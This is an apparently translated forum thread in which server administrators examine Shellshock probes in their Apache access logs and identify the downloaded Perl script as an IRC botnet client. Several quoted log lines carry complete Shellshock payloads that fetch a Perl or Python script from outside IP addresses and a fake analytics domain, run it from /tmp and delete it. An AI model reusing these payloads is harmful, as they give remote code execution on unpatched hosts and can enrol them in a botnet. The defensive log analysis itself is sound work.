我在下面看到了以下行/var/log/apache2/access_log:
"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
我还没有开始修补 bash。我立即关闭了机器。
有没有人在他们的日志中看到过这个和/或检查过在 找到的 Perl 脚本http://213.5.67.223/jurat?这似乎相当温和,但我想知道我应该有多担心?
在第 338 行,您可以看到该shell函数执行了一个从 IRC 通道另一端的某人那里获取的 shell 命令
my @resp=`$comando 2>&1 3>&1`;
这是使用与服务器相同的用户级别执行的apache。我只是希望他们不能提升特权。
我没有查看细节,但对我来说看起来并不友好:
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
这在我看来就像某种僵尸网络脚本。可怕的。修补,人们。
更新:此博客中的分析:
如果脚本成功执行,那么受感染的主机将连接到脚本中硬编码的 IRC 通道并等待命令。”
这比巴迪麦克巴德更糟糕。
我的 access_log 中有这样的行,但有些略有不同:
""() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
=>现在您可以下载它,您将获得 vilain perl 脚本: http://pastie.org/9604492
另一个 IRC bot 漏洞利用的好例子 :) 希望有所帮助
请参阅类似线程上的链接:https ://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock
这是一个脚本小子尝试利用 bash 漏洞执行基于 perl 脚本的 IRC 机器人。如果你有bash updated,另外,如果你像我一样在chroot下运行 apache ,你就不用担心了。自 9 月 27 日以来,我至少每隔一天就会在我的日志中看到这个版本的几个版本(见下文)......这只是一个噪音。
12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
我今天刚刚注意到的另一种脚本(python 脚本)执行尝试......注意:下载 python 脚本的 google-traffic-analytics.com 当然与 Google 无关。
cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""